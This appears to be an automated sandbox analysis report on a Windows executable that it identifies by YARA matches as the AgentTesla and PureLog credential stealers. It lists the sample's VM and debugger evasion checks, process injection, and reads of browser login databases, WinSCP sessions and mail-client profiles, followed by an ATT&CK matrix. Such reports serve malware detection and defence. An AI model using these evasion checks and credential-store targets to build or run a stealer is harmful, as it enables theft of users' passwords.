Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7480	Thread sleep count: 1486 > 30	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -598793s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -598250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -597921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -597593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -597374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -597046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -596935s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -596715s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -596499s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -596171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -596062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -595296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -594959s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -594718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -594607s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 598793	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 596935	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 596715	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 596499	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 594959	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 594607	Jump to behavior

Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4085282940.0000000000EED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

Code function: 1_2_01147040 CheckRemoteDebuggerPresent,

1_2_01147040

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

Memory written: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

Process created: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe "C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe"

Jump to behavior

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Queries volume information: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Queries volume information: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 1.2.T_240369_S#U0130PAR#U0130S.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.322e800.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7340, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.55e0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.55e0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.41af790.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.41af790.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1647338287.00000000055E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1641702888.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 1.2.T_240369_S#U0130PAR#U0130S.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.322e800.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7340, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 1.2.T_240369_S#U0130PAR#U0130S.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.322e800.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7340, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.55e0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.55e0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.41af790.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.41af790.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1647338287.00000000055E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1641702888.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	231 Windows Management Instrumentation	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	1 Disable or Modify Tools	1 Credentials in Registry	531 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	261 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	261 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	34 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
